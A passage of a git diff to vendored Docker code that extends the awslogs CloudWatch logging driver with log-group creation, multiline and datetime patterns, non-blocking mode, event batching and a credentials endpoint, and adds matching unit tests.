<-time.After(10 * time.Second): + t.Fatal("timeout waiting for message channel to close") + + } + lw.Close() + + lw = lr.ReadLogs(ReadConfig{Follow: true}) + for _, x := range testMsg { + select { + case msg := <-lw.Msg: + testMessageEqual(t, &x, msg) + case <-time.After(10 * time.Second): + t.Fatal("timeout reading logs") + } + } + + x := Message{Line: []byte("Too infinity and beyond!"), Timestamp: time.Now()} + assert.Check(t, l.Log(x.copy())) + + select { + case msg, ok := <-lw.Msg: + assert.Check(t, ok, "message channel unexpectedly closed") + testMessageEqual(t, &x, msg) + case <-time.After(10 * time.Second): + t.Fatal("timeout reading logs") + } + + l.Close() + select { + case msg, ok := <-lw.Msg: + assert.Check(t, !ok, "expected message channel to be closed") + assert.Check(t, is.Nil(msg)) + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for logger to close") + } + + plugin.check(t) +} + +func testMessageEqual(t *testing.T, a, b *Message) { + assert.Check(t, is.DeepEqual(a.Line, b.Line)) + assert.Check(t, is.DeepEqual(a.Timestamp.UnixNano(), b.Timestamp.UnixNano())) + assert.Check(t, is.Equal(a.Source, b.Source)) +} diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go index fee518db4b..3d6466f09d 100644 --- a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go +++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go @@ -1,19 +1,20 @@ // Package awslogs provides the logdriver for forwarding container logs to Amazon CloudWatch Logs -package awslogs +package awslogs // import "github.com/docker/docker/daemon/logger/awslogs" import ( - "errors" "fmt" "os" + "regexp" "runtime" "sort" + "strconv" "strings" "sync" "time" - "github.com/Sirupsen/logrus" "github.com/aws/aws-sdk-go/aws" "github.com/aws/aws-sdk-go/aws/awserr" + "github.com/aws/aws-sdk-go/aws/credentials/endpointcreds" 
"github.com/aws/aws-sdk-go/aws/ec2metadata" "github.com/aws/aws-sdk-go/aws/request" "github.com/aws/aws-sdk-go/aws/session" @@ -21,16 +22,22 @@ import ( "github.com/docker/docker/daemon/logger" "github.com/docker/docker/daemon/logger/loggerutils" "github.com/docker/docker/dockerversion" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) const ( - name = "awslogs" - regionKey = "awslogs-region" - regionEnvKey = "AWS_REGION" - logGroupKey = "awslogs-group" - logStreamKey = "awslogs-stream" - tagKey = "tag" - batchPublishFrequency = 5 * time.Second + name = "awslogs" + regionKey = "awslogs-region" + regionEnvKey = "AWS_REGION" + logGroupKey = "awslogs-group" + logStreamKey = "awslogs-stream" + logCreateGroupKey = "awslogs-create-group" + tagKey = "tag" + datetimeFormatKey = "awslogs-datetime-format" + multilinePatternKey = "awslogs-multiline-pattern" + credentialsEndpointKey = "awslogs-credentials-endpoint" + batchPublishFrequency = 5 * time.Second // See: http://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutLogEvents.html perEventBytes = 26 @@ -43,21 +50,30 @@ const ( resourceAlreadyExistsCode = "ResourceAlreadyExistsException" dataAlreadyAcceptedCode = "DataAlreadyAcceptedException" invalidSequenceTokenCode = "InvalidSequenceTokenException" + resourceNotFoundCode = "ResourceNotFoundException" + + credentialsEndpoint = "http://169.254.170.2" userAgentHeader = "User-Agent" ) type logStream struct { - logStreamName string - logGroupName string - client api - messages chan *logger.Message - lock sync.RWMutex - closed bool - sequenceToken *string + logStreamName string + logGroupName string + logCreateGroup bool + logNonBlocking bool + multilinePattern *regexp.Regexp + client api + messages chan *logger.Message + lock sync.RWMutex + closed bool + sequenceToken *string } +var _ logger.SizedLogger = &logStream{} + type api interface { + CreateLogGroup(*cloudwatchlogs.CreateLogGroupInput) (*cloudwatchlogs.CreateLogGroupOutput, error) 
CreateLogStream(*cloudwatchlogs.CreateLogStreamInput) (*cloudwatchlogs.CreateLogStreamOutput, error) PutLogEvents(*cloudwatchlogs.PutLogEventsInput) (*cloudwatchlogs.PutLogEventsOutput, error) } @@ -82,58 +98,176 @@ func init() { } } +// eventBatch holds the events that are batched for submission and the +// associated data about it. +// +// Warning: this type is not threadsafe and must not be used +// concurrently. This type is expected to be consumed in a single go +// routine and never concurrently. +type eventBatch struct { + batch []wrappedEvent + bytes int +} + // New creates an awslogs logger using the configuration passed in on the // context. Supported context configuration variables are awslogs-region, -// awslogs-group, and awslogs-stream. When available, configuration is +// awslogs-group, awslogs-stream, awslogs-create-group, awslogs-multiline-pattern +// and awslogs-datetime-format. When available, configuration is // also taken from environment variables AWS_REGION, AWS_ACCESS_KEY_ID, // AWS_SECRET_ACCESS_KEY, the shared credentials file (~/.aws/credentials), and // the EC2 Instance Metadata Service. 
-func New(ctx logger.Context) (logger.Logger, error) { - logGroupName := ctx.Config[logGroupKey] - logStreamName, err := loggerutils.ParseLogTag(ctx, "{{.FullID}}") +func New(info logger.Info) (logger.Logger, error) { + logGroupName := info.Config[logGroupKey] + logStreamName, err := loggerutils.ParseLogTag(info, "{{.FullID}}") if err != nil { return nil, err } + logCreateGroup := false + if info.Config[logCreateGroupKey] != "" { + logCreateGroup, err = strconv.ParseBool(info.Config[logCreateGroupKey]) + if err != nil { + return nil, err + } + } - if ctx.Config[logStreamKey] != "" { - logStreamName = ctx.Config[logStreamKey] + logNonBlocking := info.Config["mode"] == "non-blocking" + + if info.Config[logStreamKey] != "" { + logStreamName = info.Config[logStreamKey] } - client, err := newAWSLogsClient(ctx) + + multilinePattern, err := parseMultilineOptions(info) if err != nil { return nil, err } - containerStream := &logStream{ - logStreamName: logStreamName, - logGroupName: logGroupName, - client: client, - messages: make(chan *logger.Message, 4096), - } - err = containerStream.create() + + client, err := newAWSLogsClient(info) if err != nil { return nil, err } - go containerStream.collectBatch() + + containerStream := &logStream{ + logStreamName: logStreamName, + logGroupName: logGroupName, + logCreateGroup: logCreateGroup, + logNonBlocking: logNonBlocking, + multilinePattern: multilinePattern, + client: client, + messages: make(chan *logger.Message, 4096), + } + + creationDone := make(chan bool) + if logNonBlocking { + go func() { + backoff := 1 + maxBackoff := 32 + for { + // If logger is closed we are done + containerStream.lock.RLock() + if containerStream.closed { + containerStream.lock.RUnlock() + break + } + containerStream.lock.RUnlock() + err := containerStream.create() + if err == nil { + break + } + + time.Sleep(time.Duration(backoff) * time.Second) + if backoff < maxBackoff { + backoff *= 2 + } + logrus. + WithError(err). 
+ WithField("container-id", info.ContainerID). + WithField("container-name", info.ContainerName). + Error("Error while trying to initialize awslogs. Retrying in: ", backoff, " seconds") + } + close(creationDone) + }() + } else { + if err = containerStream.create(); err != nil { + return nil, err + } + close(creationDone) + } + go containerStream.collectBatch(creationDone) return containerStream, nil } +// Parses awslogs-multiline-pattern and awslogs-datetime-format options +// If awslogs-datetime-format is present, convert the format from strftime +// to regexp and return. +// If awslogs-multiline-pattern is present, compile regexp and return +func parseMultilineOptions(info logger.Info) (*regexp.Regexp, error) { + dateTimeFormat := info.Config[datetimeFormatKey] + multilinePatternKey := info.Config[multilinePatternKey] + // strftime input is parsed into a regular expression + if dateTimeFormat != "" { + // %. matches each strftime format sequence and ReplaceAllStringFunc + // looks up each format sequence in the conversion table strftimeToRegex + // to replace with a defined regular expression + r := regexp.MustCompile("%.") + multilinePatternKey = r.ReplaceAllStringFunc(dateTimeFormat, func(s string) string { + return strftimeToRegex[s] + }) + } + if multilinePatternKey != "" { + multilinePattern, err := regexp.Compile(multilinePatternKey) + if err != nil { + return nil, errors.Wrapf(err, "awslogs could not parse multiline pattern key %q", multilinePatternKey) + } + return multilinePattern, nil + } + return nil, nil +} + +// Maps strftime format strings to regex +var strftimeToRegex = map[string]string{ + /*weekdayShort */ `%a`: `(?:Mon|Tue|Wed|Thu|Fri|Sat|Sun)`, + /*weekdayFull */ `%A`: `(?:Monday|Tuesday|Wednesday|Thursday|Friday|Saturday|Sunday)`, + /*weekdayZeroIndex */ `%w`: `[0-6]`, + /*dayZeroPadded */ `%d`: `(?:0[1-9]|[1,2][0-9]|3[0,1])`, + /*monthShort */ `%b`: `(?:Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)`, + /*monthFull */ `%B`: 
`(?:January|February|March|April|May|June|July|August|September|October|November|December)`, + /*monthZeroPadded */ `%m`: `(?:0[1-9]|1[0-2])`, + /*yearCentury */ `%Y`: `\d{4}`, + /*yearZeroPadded */ `%y`: `\d{2}`, + /*hour24ZeroPadded */ `%H`: `(?:[0,1][0-9]|2[0-3])`, + /*hour12ZeroPadded */ `%I`: `(?:0[0-9]|1[0-2])`, + /*AM or PM */ `%p`: "[A,P]M", + /*minuteZeroPadded */ `%M`: `[0-5][0-9]`, + /*secondZeroPadded */ `%S`: `[0-5][0-9]`, + /*microsecondZeroPadded */ `%f`: `\d{6}`, + /*utcOffset */ `%z`: `[+-]\d{4}`, + /*tzName */ `%Z`: `[A-Z]{1,4}T`, + /*dayOfYearZeroPadded */ `%j`: `(?:0[0-9][1-9]|[1,2][0-9][0-9]|3[0-5][0-9]|36[0-6])`, + /*milliseconds */ `%L`: `\.\d{3}`, +} + // newRegionFinder is a variable such that the implementation // can be swapped out for unit tests. var newRegionFinder = func() regionFinder { return ec2metadata.New(session.New()) } +// newSDKEndpoint is a variable such that the implementation +// can be swapped out for unit tests. +var newSDKEndpoint = credentialsEndpoint + // newAWSLogsClient creates the service client for Amazon CloudWatch Logs. // Customizations to the default client from the SDK include a Docker-specific // User-Agent string and automatic region detection using the EC2 Instance // Metadata Service when region is otherwise unspecified. 
-func newAWSLogsClient(ctx logger.Context) (api, error) { +func newAWSLogsClient(info logger.Info) (api, error) { var region *string if os.Getenv(regionEnvKey) != "" { region = aws.String(os.Getenv(regionEnvKey)) } - if ctx.Config[regionKey] != "" { - region = aws.String(ctx.Config[regionKey]) + if info.Config[regionKey] != "" { + region = aws.String(info.Config[regionKey]) } if region == nil || *region == "" { logrus.Info("Trying to get region from EC2 Metadata") @@ -147,11 +281,33 @@ func newAWSLogsClient(ctx logger.Context) (api, error) { } region = &r } + + sess, err := session.NewSession() + if err != nil { + return nil, errors.New("Failed to create a service client session for for awslogs driver") + } + + // attach region to cloudwatchlogs config + sess.Config.Region = region + + if uri, ok := info.Config[credentialsEndpointKey]; ok { + logrus.Debugf("Trying to get credentials from awslogs-credentials-endpoint") + + endpoint := fmt.Sprintf("%s%s", newSDKEndpoint, uri) + creds := endpointcreds.NewCredentialsClient(*sess.Config, sess.Handlers, endpoint, + func(p *endpointcreds.Provider) { + p.ExpiryWindow = 5 * time.Minute + }) + + // attach credentials to cloudwatchlogs config + sess.Config.Credentials = creds + } + logrus.WithFields(logrus.Fields{ "region": *region, }).Debug("Created awslogs client") - client := cloudwatchlogs.New(session.New(), aws.NewConfig().WithRegion(*region)) + client := cloudwatchlogs.New(sess) client.Handlers.Build.PushBackNamed(request.NamedHandler{ Name: "DockerUserAgentHandler", @@ -170,14 +326,26 @@ func (l *logStream) Name() string { return name } +func (l *logStream) BufSize() int { + return maximumBytesPerEvent +} + // Log submits messages for logging by an instance of the awslogs logging driver func (l *logStream) Log(msg *logger.Message) error { l.lock.RLock() defer l.lock.RUnlock() - if !l.closed { - // buffer up the data, making sure to copy the Line data - l.messages <- logger.CopyMessage(msg) + if l.closed { + return 
errors.New("awslogs is closed") } + if l.logNonBlocking { + select { + case l.messages <- msg: + return nil + default: + return errors.New("awslogs buffer is full") + } + } + l.messages <- msg return nil } @@ -192,8 +360,52 @@ func (l *logStream) Close() error { return nil } -// create creates a log stream for the instance of the awslogs logging driver +// create creates log group and log stream for the instance of the awslogs logging driver func (l *logStream) create() error { + if err := l.createLogStream(); err != nil { + if l.logCreateGroup { + if awsErr, ok := err.(awserr.Error); ok && awsErr.Code() == resourceNotFoundCode { + if err := l.createLogGroup(); err != nil { + return err + } + return l.createLogStream() + } + } + if err != nil { + return err + } + } + + return nil +} + +// createLogGroup creates a log group for the instance of the awslogs logging driver +func (l *logStream) createLogGroup() error { + if _, err := l.client.CreateLogGroup(&cloudwatchlogs.CreateLogGroupInput{ + LogGroupName: aws.String(l.logGroupName), + }); err != nil { + if awsErr, ok := err.(awserr.Error); ok { + fields := logrus.Fields{ + "errorCode": awsErr.Code(), + "message": awsErr.Message(), + "origError": awsErr.OrigErr(), + "logGroupName": l.logGroupName, + "logCreateGroup": l.logCreateGroup, + } + if awsErr.Code() == resourceAlreadyExistsCode { + // Allow creation to succeed + logrus.WithFields(fields).Info("Log group already exists") + return nil + } + logrus.WithFields(fields).Error("Failed to create log group") + } + return err + } + return nil +} + +// createLogStream creates a log stream for the instance of the awslogs logging driver +func (l *logStream) createLogStream() error { input := &cloudwatchlogs.CreateLogStreamInput{ LogGroupName: aws.String(l.logGroupName), LogStreamName: aws.String(l.logStreamName), @@ -228,71 +440,117 @@ var newTicker = func(freq time.Duration) *time.Ticker { } // collectBatch executes as a goroutine to perform batching of log events for 
-// submission to the log stream. Batching is performed on time- and size- -// bases. Time-based batching occurs at a 5 second interval (defined in the -// batchPublishFrequency const). Size-based batching is performed on the -// maximum number of events per batch (defined in maximumLogEventsPerPut) and -// the maximum number of total bytes in a batch (defined in -// maximumBytesPerPut). Log messages are split by the maximum bytes per event -// (defined in maximumBytesPerEvent). There is a fixed per-event byte overhead -// (defined in perEventBytes) which is accounted for in split- and batch- -// calculations. -func (l *logStream) collectBatch() { - timer := newTicker(batchPublishFrequency) - var events []wrappedEvent - bytes := 0 +// submission to the log stream. If the awslogs-multiline-pattern or +// awslogs-datetime-format options have been configured, multiline processing +// is enabled, where log messages are stored in an event buffer until a multiline +// pattern match is found, at which point the messages in the event buffer are +// pushed to CloudWatch logs as a single log event. Multiline messages are processed +// according to the maximumBytesPerPut constraint, and the implementation only +// allows for messages to be buffered for a maximum of 2*batchPublishFrequency +// seconds. When events are ready to be processed for submission to CloudWatch +// Logs, the processEvents method is called. If a multiline pattern is not +// configured, log events are submitted to the processEvents method immediately. 
+func (l *logStream) collectBatch(created chan bool) { + // Wait for the logstream/group to be created + <-created + ticker := newTicker(batchPublishFrequency) + var eventBuffer []byte + var eventBufferTimestamp int64 + var batch = newEventBatch() for { select { - case <-timer.C: - l.publishBatch(events) - events = events[:0] - bytes = 0 + case t := <-ticker.C: + // If event buffer is older than batch publish frequency flush the event buffer + if eventBufferTimestamp > 0 && len(eventBuffer) > 0 { + eventBufferAge := t.UnixNano()/int64(time.Millisecond) - eventBufferTimestamp + eventBufferExpired := eventBufferAge >= int64(batchPublishFrequency)/int64(time.Millisecond) + eventBufferNegative := eventBufferAge < 0 + if eventBufferExpired || eventBufferNegative { + l.processEvent(batch, eventBuffer, eventBufferTimestamp) + eventBuffer = eventBuffer[:0] + } + } + l.publishBatch(batch) + batch.reset() case msg, more := <-l.messages: if !more { - l.publishBatch(events) + // Flush event buffer and release resources + l.processEvent(batch, eventBuffer, eventBufferTimestamp) + eventBuffer = eventBuffer[:0] + l.publishBatch(batch) + batch.reset() return } - unprocessedLine := msg.Line - for len(unprocessedLine) > 0 { - // Split line length so it does not exceed the maximum - lineBytes := len(unprocessedLine) - if lineBytes > maximumBytesPerEvent { - lineBytes = maximumBytesPerEvent + if eventBufferTimestamp == 0 { + eventBufferTimestamp = msg.Timestamp.UnixNano() / int64(time.Millisecond) + } + line := msg.Line + if l.multilinePattern != nil { + if l.multilinePattern.Match(line) || len(eventBuffer)+len(line) > maximumBytesPerEvent { + // This is a new log event or we will exceed max bytes per event + // so flush the current eventBuffer to events and reset timestamp + l.processEvent(batch, eventBuffer, eventBufferTimestamp) + eventBufferTimestamp = msg.Timestamp.UnixNano() / int64(time.Millisecond) + eventBuffer = eventBuffer[:0] } - line := unprocessedLine[:lineBytes] - 
unprocessedLine = unprocessedLine[lineBytes:] - if (len(events) >= maximumLogEventsPerPut) || (bytes+lineBytes+perEventBytes > maximumBytesPerPut) { - // Publish an existing batch if it's already over the maximum number of events or if adding this - // event would push it over the maximum number of total bytes. - l.publishBatch(events) - events = events[:0] - bytes = 0 + // Append new line if event is less than max event size + if len(line) < maximumBytesPerEvent { + line = append(line, "\n"...) } - events = append(events, wrappedEvent{ - inputLogEvent: &cloudwatchlogs.InputLogEvent{ - Message: aws.String(string(line)), - Timestamp: aws.Int64(msg.Timestamp.UnixNano() / int64(time.Millisecond)), - }, - insertOrder: len(events), - }) - bytes += (lineBytes + perEventBytes) + eventBuffer = append(eventBuffer, line...) + logger.PutMessage(msg) + } else { + l.processEvent(batch, line, msg.Timestamp.UnixNano()/int64(time.Millisecond)) + logger.PutMessage(msg) } } } } +// processEvent processes log events that are ready for submission to CloudWatch +// logs. Batching is performed on time- and size-bases. Time-based batching +// occurs at a 5 second interval (defined in the batchPublishFrequency const). +// Size-based batching is performed on the maximum number of events per batch +// (defined in maximumLogEventsPerPut) and the maximum number of total bytes in a +// batch (defined in maximumBytesPerPut). Log messages are split by the maximum +// bytes per event (defined in maximumBytesPerEvent). There is a fixed per-event +// byte overhead (defined in perEventBytes) which is accounted for in split- and +// batch-calculations. 
+func (l *logStream) processEvent(batch *eventBatch, events []byte, timestamp int64) { + for len(events) > 0 { + // Split line length so it does not exceed the maximum + lineBytes := len(events) + if lineBytes > maximumBytesPerEvent { + lineBytes = maximumBytesPerEvent + } + line := events[:lineBytes] + + event := wrappedEvent{ + inputLogEvent: &cloudwatchlogs.InputLogEvent{ + Message: aws.String(string(line)), + Timestamp: aws.Int64(timestamp), + }, + insertOrder: batch.count(), + } + + added := batch.add(event, lineBytes) + if added { + events = events[lineBytes:] + } else { + l.publishBatch(batch) + batch.reset() + } + } +} + // publishBatch calls PutLogEvents for a given set of InputLogEvents, // accounting for sequencing requirements (each request must reference the // sequence token returned by the previous request). -func (l *logStream) publishBatch(events []wrappedEvent) { - if len(events) == 0 { +func (l *logStream) publishBatch(batch *eventBatch) { + if batch.isEmpty() { return } - - // events in a batch must be sorted by timestamp - // see http://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutLogEvents.html - sort.Sort(byTimestamp(events)) - cwEvents := unwrapEvents(events) + cwEvents := unwrapEvents(batch.events()) nextSequenceToken, err := l.putLogEvents(cwEvents, l.sequenceToken) @@ -349,14 +607,19 @@ func (l *logStream) putLogEvents(events []*cloudwatchlogs.InputLogEvent, sequenc } // ValidateLogOpt looks for awslogs-specific log options awslogs-region, -// awslogs-group, and awslogs-stream +// awslogs-group, awslogs-stream, awslogs-create-group, awslogs-datetime-format, +// awslogs-multiline-pattern func ValidateLogOpt(cfg map[string]string) error { for key := range cfg { switch key { case logGroupKey: case logStreamKey: + case logCreateGroupKey: case regionKey: case tagKey: + case datetimeFormatKey: + case multilinePatternKey: + case credentialsEndpointKey: default: return fmt.Errorf("unknown log opt '%s' for %s log driver", 
key, name) } @@ -364,6 +627,16 @@ func ValidateLogOpt(cfg map[string]string) error { if cfg[logGroupKey] == "" { return fmt.Errorf("must specify a value for log opt '%s'", logGroupKey) } + if cfg[logCreateGroupKey] != "" { + if _, err := strconv.ParseBool(cfg[logCreateGroupKey]); err != nil { + return fmt.Errorf("must specify valid value for log opt '%s': %v", logCreateGroupKey, err) + } + } + _, datetimeFormatKeyExists := cfg[datetimeFormatKey] + _, multilinePatternKeyExists := cfg[multilinePatternKey] + if datetimeFormatKeyExists && multilinePatternKeyExists { + return fmt.Errorf("you cannot configure log opt '%s' and '%s' at the same time", datetimeFormatKey, multilinePatternKey) + } return nil } @@ -396,9 +669,76 @@ func (slice byTimestamp) Swap(i, j int) { } func unwrapEvents(events []wrappedEvent) []*cloudwatchlogs.InputLogEvent { - cwEvents := []*cloudwatchlogs.InputLogEvent{} - for _, input := range events { - cwEvents = append(cwEvents, input.inputLogEvent) + cwEvents := make([]*cloudwatchlogs.InputLogEvent, len(events)) + for i, input := range events { + cwEvents[i] = input.inputLogEvent } return cwEvents } + +func newEventBatch() *eventBatch { + return &eventBatch{ + batch: make([]wrappedEvent, 0), + bytes: 0, + } +} + +// events returns a slice of wrappedEvents sorted in order of their +// timestamps and then by their insertion order (see `byTimestamp`). +// +// Warning: this method is not threadsafe and must not be used +// concurrently. +func (b *eventBatch) events() []wrappedEvent { + sort.Sort(byTimestamp(b.batch)) + return b.batch +} + +// add adds an event to the batch of events accounting for the +// necessary overhead for an event to be logged. An error will be +// returned if the event cannot be added to the batch due to service +// limits. +// +// Warning: this method is not threadsafe and must not be used +// concurrently. 
+func (b *eventBatch) add(event wrappedEvent, size int) bool { + addBytes := size + perEventBytes + + // verify we are still within service limits + switch { + case len(b.batch)+1 > maximumLogEventsPerPut: + return false + case b.bytes+addBytes > maximumBytesPerPut: + return false + } + + b.bytes += addBytes + b.batch = append(b.batch, event) + + return true +} + +// count is the number of batched events. Warning: this method +// is not threadsafe and must not be used concurrently. +func (b *eventBatch) count() int { + return len(b.batch) +} + +// size is the total number of bytes that the batch represents. +// +// Warning: this method is not threadsafe and must not be used +// concurrently. +func (b *eventBatch) size() int { + return b.bytes +} + +func (b *eventBatch) isEmpty() bool { + zeroEvents := b.count() == 0 + zeroSize := b.size() == 0 + return zeroEvents && zeroSize +} + +// reset prepares the batch for reuse. +func (b *eventBatch) reset() { + b.bytes = 0 + b.batch = b.batch[:0] +} diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go index d5b1aaef52..6955d910c3 100644 --- a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go @@ -1,10 +1,14 @@ -package awslogs +package awslogs // import "github.com/docker/docker/daemon/logger/awslogs" import ( "errors" "fmt" + "io/ioutil" "net/http" + "net/http/httptest" + "os" "reflect" + "regexp" "runtime" "strings" "testing" @@ -17,6 +21,8 @@ import ( "github.com/docker/docker/daemon/logger" "github.com/docker/docker/daemon/logger/loggerutils" "github.com/docker/docker/dockerversion" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) const ( @@ -24,17 +30,43 @@ const ( streamName = "streamName" sequenceToken = "sequenceToken" nextSequenceToken = "nextSequenceToken" - logline = "this is a log 
line" + logline = "this is a log line\r" + multilineLogline = "2017-01-01 01:01:44 This is a multiline log entry\r" ) +// Generates i multi-line events each with j lines +func (l *logStream) logGenerator(lineCount int, multilineCount int) { + for i := 0; i < multilineCount; i++ { + l.Log(&logger.Message{ + Line: []byte(multilineLogline), + Timestamp: time.Time{}, + }) + for j := 0; j < lineCount; j++ { + l.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Time{}, + }) + } + } +} + +func testEventBatch(events []wrappedEvent) *eventBatch { + batch := newEventBatch() + for _, event := range events { + eventlen := len([]byte(*event.inputLogEvent.Message)) + batch.add(event, eventlen) + } + return batch +} + func TestNewAWSLogsClientUserAgentHandler(t *testing.T) { - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ regionKey: "us-east-1", }, } - client, err := newAWSLogsClient(ctx) + client, err := newAWSLogsClient(info) if err != nil { t.Fatal(err) } @@ -59,7 +91,7 @@ func TestNewAWSLogsClientUserAgentHandler(t *testing.T) { } func TestNewAWSLogsClientRegionDetect(t *testing.T) { - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{}, } @@ -71,7 +103,7 @@ func TestNewAWSLogsClientRegionDetect(t *testing.T) { successResult: "us-east-1", } - _, err := newAWSLogsClient(ctx) + _, err := newAWSLogsClient(info) if err != nil { t.Fatal(err) } @@ -99,8 +131,39 @@ func TestCreateSuccess(t *testing.T) { t.Errorf("Expected LogGroupName to be %s", groupName) } if argument.LogStreamName == nil { + t.Fatal("Expected non-nil LogStreamName") + } + if *argument.LogStreamName != streamName { + t.Errorf("Expected LogStreamName to be %s", streamName) + } +} + +func TestCreateLogGroupSuccess(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + logCreateGroup: true, + } + mockClient.createLogGroupResult <- &createLogGroupResult{} + 
mockClient.createLogStreamResult <- &createLogStreamResult{} + + err := stream.create() + + if err != nil { + t.Errorf("Received unexpected err: %v\n", err) + } + argument := <-mockClient.createLogStreamArgument + if argument.LogGroupName == nil { t.Fatal("Expected non-nil LogGroupName") } + if *argument.LogGroupName != groupName { + t.Errorf("Expected LogGroupName to be %s", groupName) + } + if argument.LogStreamName == nil { + t.Fatal("Expected non-nil LogStreamName") + } if *argument.LogStreamName != streamName { t.Errorf("Expected LogStreamName to be %s", streamName) } @@ -112,7 +175,7 @@ func TestCreateError(t *testing.T) { client: mockClient, } mockClient.createLogStreamResult <- &createLogStreamResult{ - errorResult: errors.New("Error!"), + errorResult: errors.New("Error"), } err := stream.create() @@ -138,6 +201,93 @@ func TestCreateAlreadyExists(t *testing.T) { } } +func TestLogClosed(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + closed: true, + } + err := stream.Log(&logger.Message{}) + if err == nil { + t.Fatal("Expected non-nil error") + } +} + +func TestLogBlocking(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + messages: make(chan *logger.Message), + } + + errorCh := make(chan error, 1) + started := make(chan bool) + go func() { + started <- true + err := stream.Log(&logger.Message{}) + errorCh <- err + }() + <-started + select { + case err := <-errorCh: + t.Fatal("Expected stream.Log to block: ", err) + default: + break + } + select { + case <-stream.messages: + break + default: + t.Fatal("Expected to be able to read from stream.messages but was unable to") + } + select { + case err := <-errorCh: + if err != nil { + t.Fatal(err) + } + case <-time.After(30 * time.Second): + t.Fatal("timed out waiting for read") + } +} + +func TestLogNonBlockingBufferEmpty(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + 
messages: make(chan *logger.Message, 1), + logNonBlocking: true, + } + err := stream.Log(&logger.Message{}) + if err != nil { + t.Fatal(err) + } +} + +func TestLogNonBlockingBufferFull(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + messages: make(chan *logger.Message, 1), + logNonBlocking: true, + } + stream.messages <- &logger.Message{} + errorCh := make(chan error) + started := make(chan bool) + go func() { + started <- true + err := stream.Log(&logger.Message{}) + errorCh <- err + }() + <-started + select { + case err := <-errorCh: + if err == nil { + t.Fatal("Expected non-nil error") + } + case <-time.After(30 * time.Second): + t.Fatal("Expected Log call to not block") + } +} func TestPublishBatchSuccess(t *testing.T) { mockClient := newMockClient() stream := &logStream{ @@ -159,7 +309,7 @@ func TestPublishBatchSuccess(t *testing.T) { }, } - stream.publishBatch(events) + stream.publishBatch(testEventBatch(events)) if stream.sequenceToken == nil { t.Fatal("Expected non-nil sequenceToken") } @@ -193,7 +343,7 @@ func TestPublishBatchError(t *testing.T) { sequenceToken: aws.String(sequenceToken), } mockClient.putLogEventsResult <- &putLogEventsResult{ - errorResult: errors.New("Error!"), + errorResult: errors.New("Error"), } events := []wrappedEvent{ @@ -204,7 +354,7 @@ func TestPublishBatchError(t *testing.T) { }, } - stream.publishBatch(events) + stream.publishBatch(testEventBatch(events)) if stream.sequenceToken == nil { t.Fatal("Expected non-nil sequenceToken") } @@ -238,7 +388,7 @@ func TestPublishBatchInvalidSeqSuccess(t *testing.T) { }, } - stream.publishBatch(events) + stream.publishBatch(testEventBatch(events)) if stream.sequenceToken == nil { t.Fatal("Expected non-nil sequenceToken") } @@ -301,7 +451,7 @@ func TestPublishBatchAlreadyAccepted(t *testing.T) { }, } - stream.publishBatch(events) + stream.publishBatch(testEventBatch(events)) if stream.sequenceToken == nil { t.Fatal("Expected non-nil 
sequenceToken") } @@ -347,8 +497,9 @@ func TestCollectBatchSimple(t *testing.T) { C: ticks, } } - - go stream.collectBatch() + d := make(chan bool) + close(d) + go stream.collectBatch(d) stream.Log(&logger.Message{ Line: []byte(logline), @@ -391,7 +542,9 @@ func TestCollectBatchTicker(t *testing.T) { } } - go stream.collectBatch() + d := make(chan bool) + close(d) + go stream.collectBatch(d) stream.Log(&logger.Message{ Line: []byte(logline + " 1"), @@ -440,6 +593,295 @@ func TestCollectBatchTicker(t *testing.T) { } +func TestCollectBatchMultilinePattern(t *testing.T) { + mockClient := newMockClient() + multilinePattern := regexp.MustCompile("xxxx") + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + multilinePattern: multilinePattern, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + d := make(chan bool) + close(d) + go stream.collectBatch(d) + + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Now(), + }) + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Now(), + }) + stream.Log(&logger.Message{ + Line: []byte("xxxx " + logline), + Timestamp: time.Now(), + }) + + ticks <- time.Now() + + // Verify single multiline event + argument := <-mockClient.putLogEventsArgument + assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput") + assert.Check(t, is.Equal(1, len(argument.LogEvents)), "Expected single multiline event") + assert.Check(t, is.Equal(logline+"\n"+logline+"\n", *argument.LogEvents[0].Message), "Received incorrect multiline message") + + stream.Close() + + // Verify single event + argument = 
